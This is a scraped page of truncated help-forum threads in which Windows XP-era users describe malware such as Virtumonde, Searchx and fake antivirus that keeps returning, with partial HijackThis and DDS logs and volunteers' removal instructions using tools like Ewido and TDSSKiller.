this person had the same issue that i'm having now i'm thinking. the only difference is that in my HJT log, i see an MSCNCO.exe running in my SYSTEM32 directory which probably is running the MSNNEOD.exe file. i have an entry that says:

O23 - Service: Ms Database Manager Service (mscncosd) - Unknown Owner - C\WINDOWS\SYSTEM32\mscnco.exe

the only problem is i can't delete this file because it says it's in use. i haven't done combofix, as i'm not sure how to use it and am awaiting your help. supposedly that's the file causing the loading of the other files, according to that person who posted in the link i provided.

please advise. thanks!!

2 more replies

Ok I've been fixing my computer for 2 weeks and 3 days now and I will not reinstall my Windows until I fix it

I ran Norton anti virus 2004 in safe mode
I also ran it in diagnostic startup
I have updated virus definitions
After norton got done 1 file could not be deleted so I delete it manually
Then I ran hijackthis and I fixed all aboutblank
trust me I fixed all the bad things
Then I ran SWSHREDDER and it found Searchx which it deleted
Then I ran spybot search and destroy 1.3
Adaware with updated definitions
and Spysweeper
Only Spybot which I ran second found Webdialer and could not delete it
so I deleted it manually
then I went into registry into all possible IE files under
software/microsoft/ie/main and deleted all the files that had anything to do with Searchx (after working on it for 2 weeks I know exactly what is what)

Then I ran everything over again and everything returned nothing
means my computer is clear

so I go online and I type blahblah.con since I figured that when I go to a not existing page the god damned pop up comes back
oh before this I changed all my default search pages to google.com
and guess what it came back


NO N00b advice please I tried everything that is noobish
I also noticed that the dll file in windows/system32 that is causing this trouble once found by norton anti virus cannot be deleted until restart and by that time it makes a copy of itself under some dumb name like (so far it was called this)
noob.dll
cnn.dll
clan.... Read more

Answer:Searchx keeps coming back WTF am I TO DO?

Two weeks and three days, I would have used Fdisk by then.
Sometimes it is best to toss in the towel, or in this case, the floppy!
or CD if 2k or xp.
 

10 more replies

I was attacked by spyware a month or so ago, I was able to remove most of it on my own using AVG anti-spyware, killbox, hijack this, and some registry fixes. I am currently using AVG to guard my system, but some of the problems keep coming back again and again. Namely, tiny.id (xoasonqc.exe in the system32 folder) and trojan.agent.aoy (tnypwspg.exe) also, hjy.dll and gebyawv.dll which is particularly irritating, as AVG pops up that it finds it at least twice every boot up. Right now, I have been quarantining the files as it seems when I set to "permanently remove" they came back quicker. In the infections log of AVG, gebyawv is listed at least twenty times. Since the attack I have noticed other quirks such as pages not loading correctly in Netscape 9, seemingly slower operation when launching programs (some perhaps due to system resources taken up by AVG and A squared which now run in background). Please let me know if I can completely eliminate these problems and restore my system to its former operating conditions.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:49:19 PM, on 12/1/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer... Read more

Answer:Spyware keeps coming back

14 more replies

Hi, I have completed steps 1 thru 6 of READ & RUN ME FIRST several times, but no luck so far. Virtumondo keeps coming back.

1) In normal mode, only MS Antispyware caught it.
2) Switched to safe mode with networking support:
- Ad Aware caught it and confirmed deletion.
- MS Antispyware caught it again and confirmed deletion.
3) Rebooted again to normal mode and Virtumondo is back.
4) Repeated 1 - 6 in safe mode again, but Virtumondo is back again.

This awvvt.dll file keeps coming up as a malware by MS Antispyware, but I'm afraid to delete it manually without some expert guidance.

Can you please help? I have only been able to retrieve the MS Antispyware log, which is listed first below and followed by the HJT log.

Thanks in advance for your help!!!


Edit by bjgarrick: Unrequested, Inline HJT & MSAS log removed!

 

Answer:Please help. Virumondo keeps coming back!

Download this trial version of Ewido Security Suite


Install ewido security suite
Launch ewido, there should be an icon on your desktop double-click it.
The program will have a window come up. One of the buttons on the left is to Update. Click the Update button and then Start the Update. The update will start and a progress bar will show the updates being installed.
After it completes the update, click the Scanner button

Now exit Ewido. Now print the below instructions or save them locally because I want you to have no browsers opened and also have no connection to the internet (unplug your cable) while doing the below.

Okay, reboot into safe mode and follow the steps below. (If you have any problems at all trying to get into safe mode to complete these steps, just run them in normal boot mode and make sure you tell me when you come back.)

Open up Ewido and do the following:


Click on Scanner
Then click Settings
Under What to Scan? Select Scan every file
Then click OK
Click on Complete System Scan and the scan will start.
Let the program scan the machine
While the scan is in progress you will be prompted to clean files that are infected. Leave the defaults selections (to Remove and backup) and click OK. To save yourself some time, you can select Perform action with all infections and then click OK. With the option to scan every file, a lot of cookies will be removed.

Once the scan has completed, there will be a button located on the bot... Read more

8 more replies

I've been working on a user's laptop (Win XP SP3) that wouldn't boot, even into safe mode. I ran a windows repair from a Win XP SP3 installation CD, which allowed me to at least get into safe mode. There I found several trojans and viruses, including (these are Symantec names) Trojan.FakeAV!gen29, W32.Harakit, Trojan.Gen, Trojan.FakeAV. After cleaning, Malwarebytes found registry entries for Hijack.FolderOptions and Trojan.Agent. Finally satisfied that the system was clean, I restored the drivers and downloaded and installed all the Windows updates. Both processes required several reboots. I then returned the laptop to the user. Unfortunately, I made the mistake of not running final scans of the system first. But there had been no symptoms during the system restoration, so I was lulled into what was obviously a false sense of security.

Immediately after booting the system the next day, he got an alert from Symantec AV about two infected files: DWH9F.tmp and DWH1E.tmp, both in his profile's Local Settings\Temp folder. They were identified only as "Trojans" - no specifics. He was not yet connected to the internet and had no external devices attached. Laptop back to me. Malwarebytes found two infected registry items: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost (Trojan.Agent) and HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load (Trojan.Agent).

I'm conc... Read more

Answer:Trojan(s?) Keep Coming Back

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review your topic and do their best to resolve your issues.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Follow the instructions that... Read more

2 more replies

On my win XP desktop I found couple of viruses 1-trojan metajuan and 2 trojan virtumonde, while scanned with Norton antivirus.
NAV removed the virus not once twice but more than 4 times and keep coming back even after disabling the system restore.

I also used PC tools spyware doctor and scanned the computer several times; the same viruses keep coming back.
Any help will be very much appreciated.
Please help me remove these viruses from computer.
Thank you.

Answer:Virtumonde Keeps Coming Back

You need to post in the correct forum. I'll move you there

9 more replies

I had this fake Antivirus Scan telling me that my computer was full of viruses. I ran Avast Antivirus and got rid of some stuff and ran Malwarebytes and got rid of a lot more.

Problem came back within a few days. Did the same thing this week and the computer seems to be running ok for awhile and then more attacks.

Now I am even getting a "Generic Host Process for Win32 Services has encountered a problem error" every time I start up the computer and the error pops up throughout the session.

Below are the log files that were requested. I had to do the log programs in Safe Mode as the computer is much more stable in Safe Mode and my Firewall will not turn on in regular mode.

DDS (Ver_10-12-12.02) - NTFSx86 NETWORK
Run by Administrator at 14:57:31.00 on Sun 01/30/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.478.84 [GMT -6:00]

AV: avast! Antivirus *Enabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: McAfee VirusScan *Enabled/Updated* {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *Disabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.ex... Read more

Answer:Seem to be infected with something that keeps coming back

Hello jeffw11, Welcome to Bleeping Computer.
My name is fireman4it and I will be helping you with your Malware problem.

Please take note of some guidelines for this fix:
Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
Finally, please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.

1. Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!
Be sure to download TDSSKiller.exe (v2.4.0.0) from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.
Double-click on TDSSKiller.exe to run the tool for known TDSS variants.
Vista/Windows 7 users right-click and select Run As Administrator.
If TDSSKiller does not run, try renaming it. To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the... Read more

12 more replies

Hi,

I have tried to remove Exactsearch from my PC, but every time I scan with Panda it says my memory is infected with it again.

My Hijack this log is:

Logfile of HijackThis v1.99.1
Scan saved at 12:21:17 PM, on 26/04/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)


Answer:Exactsearch keeps coming back

hi, Can you post the exact location of the Exactsearch item Panda says it found please?

Look in the program Results or Report from a scan where it was found and post where the item supposedly is.

One thing to try is to find the quarantine or items that were removed by Microsoft Antispyware, AdAware, Spybot or other program and delete those backed up items. Panda or another scanner may detect those.
 

3 more replies